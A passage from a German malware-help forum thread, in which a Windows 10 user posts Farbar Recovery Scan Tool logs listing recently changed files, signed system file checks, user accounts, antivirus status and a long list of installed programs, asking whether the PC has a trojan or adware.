2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod
2017-05-07 17:14 - 2017-01-29 17:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys
2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc
2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8
2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1
2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2017-05-07 17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2017-05-07 17:14 - 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive
2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek
2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared
2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-05-07 16:46 - 2017-03-20 07:06 - 00000000 ___HD C:\$WINDOWS.~BT
2017-05-01 12:46 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD
2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam
2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb
2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2017-04-22 19:40 - 2015-04-26 13:54 - 00000000 ____D C:\Users\Dino\AppData\Local\JDownloader v2.0
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg
2017-02-05 19:40 - 2017-02-05 19:40 - 0046145 _____ () C:\ProgramData\agent.1486316443.bdinstall.bin
2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin
2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin
2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin
2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin
2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin
2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin
2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin
2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin
2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin
2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin
2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin
2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin
2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin
2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
Einige Dateien in TEMP:
====================
2017-05-19 14:19 - 2014-01-23 08:04 - 0178760 _____ (Microsoft Corporation) C:\Users\Dino\AppData\Local\Temp\ose00000.exe
2017-05-19 14:16 - 2017-05-19 14:16 - 7178424 _____ (VS Revo Group ) C:\Users\Dino\AppData\Local\Temp\VSUSetup.exe
==================== Bamital & volsnap ======================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2017-05-07 17:13
==================== Ende von FRST.txt ============================
|
|
19.05.2017, 14:31
| #2 |
| | Trojaner, Adware oder sonstiges ?Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 14-05-2017
durchgeführt von Dino (19-05-2017 14:42:22)
Gestartet von D:\Dino\Downloads
Windows 10 Pro Version 1703 (X64) (2017-05-07 15:20:06)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-3554052566-3312977812-1675691648-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3554052566-3312977812-1675691648-503 - Limited - Disabled)
Dino (S-1-5-21-3554052566-3312977812-1675691648-1001 - Administrator - Enabled) => C:\Users\Dino
Gast (S-1-5-21-3554052566-3312977812-1675691648-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3554052566-3312977812-1675691648-1003 - Limited - Enabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Virenschutz (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Spybot - Search and Destroy (Disabled - Up to date) {A16C3F68-9280-E053-1818-342707FECF4D}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
ACP Application (Version: 2016.0321.0955.20 - Advanced Micro Devices, Inc.) Hidden
Adblock Plus für IE (32-Bit- und 64-Bit) (HKLM\...\{C27EF409-FB69-451F-B996-DC853C25FCA2}) (Version: 1.4 - Eyeo GmbH)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
AI Suite 3 (HKLM-x32\...\{CD36E28B-6023-469A-91E7-049A2874EC13}) (Version: 1.00.92 - ASUSTeK Computer Inc.)
AMD Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
ANNO 1404 - Königsedition (HKLM-x32\...\{3D9CF3CA-3AB0-4A82-9853-D7C43FD1D775}) (Version: 3.10.0000 - Ubisoft)
ANNO 2070 (HKLM-x32\...\{B48E264C-C8CD-4617-B0BE-46E977BAD694}) (Version: 1.0.0.0 - Ubisoft)
Anno 2205 (HKLM-x32\...\Uplay Install 1253) (Version: - Ubisoft)
ASUS GPU Tweak (HKLM-x32\...\InstallShield_{532F6E8A-AF97-41C3-915F-39F718EC07D1}) (Version: 2.8.2.0 - ASUSTek COMPUTER INC.)
ASUS GPU Tweak (x32 Version: 2.8.2.0 - ASUSTek COMPUTER INC.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Besiege (HKLM-x32\...\Steam App 346010) (Version: - Spiderling Studios)
Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.18.898 - Bitdefender)
Bitdefender Internet Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.2.3 - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.5.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.10.15 - Canon Inc.)
Canon MG5600 series Benutzerregistrierung (HKLM-x32\...\Canon MG5600 series Benutzerregistrierung) (Version: - *Canon Inc.)
Canon MG5600 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5600_series) (Version: 1.00 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.2.1 - Canon Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Cities Skyline (HKLM-x32\...\Cities Skyline_is1) (Version: 1.0.5.0 - Paradox Interactive)
CrystalDiskInfo 6.3.2 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 6.3.2 - Crystal Dew World)
Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Drakonia Configurator (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version: - )
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.2.22525 - Landesfinanzdirektion Thüringen)
EVEREST Home Edition v2.20 (HKLM-x32\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc)
Ghost Recon Wildlands Beta (HKLM-x32\...\Uplay Install 2970) (Version: - Ubisoft)
Ghostery (HKLM-x32\...\Ghostery) (Version: - Ghostery Inc)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{B3B750C0-8C22-439D-B7CE-67F3ED99CC2B}) (Version: 1.20.146.0 - Microsoft)
Mozilla Firefox 53.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0.2 (x86 de)) (Version: 53.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.2.6333 - Mozilla)
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
Panda Devices Agent (x32 Version: 1.03.07 - Panda Security) Hidden
Panda Devices Agent (x32 Version: 1.06.00 - Panda Security) Hidden
Panda Free Antivirus (Version: 8.04.00.0000 - Panda Security) Hidden
PDF24 Creator 7.9.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: - PDF24.org)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.31.423.2014 - Realtek)
Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 2.0.2.7 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7503 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Sacred 3 (HKLM-x32\...\Steam App 247950) (Version: - Keen Games)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.5.1 - Samsung Electronics)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Samsung_MonSetup (HKLM-x32\...\{8EA79DBF-D637-448A-89D6-410A087A4493}) (Version: 1.00.0000 - Samsung)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.86.0859 - Electronic Arts)
Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.)
Smart Switch (x32 Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) Hidden
Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Tom Clancy's The Division (HKLM-x32\...\Uplay Install 568) (Version: - Ubisoft)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Uplay (HKLM-x32\...\Uplay) (Version: 6.0 - Ubisoft)
Vulkan Run Time Libraries 1.0.3.1 (HKLM\...\VulkanRT1.0.3.1) (Version: 1.0.3.1 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version: - Relic Entertainment)
